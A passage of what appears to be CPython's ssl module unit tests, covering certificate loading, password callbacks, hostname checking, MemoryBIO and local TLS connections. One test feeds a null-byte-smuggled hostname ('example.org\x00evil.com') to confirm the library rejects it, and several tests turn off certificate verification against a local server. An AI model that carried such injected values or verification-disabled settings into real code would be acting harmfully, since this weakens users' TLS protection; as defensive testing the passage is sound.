return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
@unittest.skipUnless(IS_OPENSSL_1_1_1, "Test requires OpenSSL 1.1.1")
def test_num_tickest(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
# A simple IO loop. Call func(*args) depending on the error we get
# (WANT_READ or WANT_WRITE) move data between the socket and the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
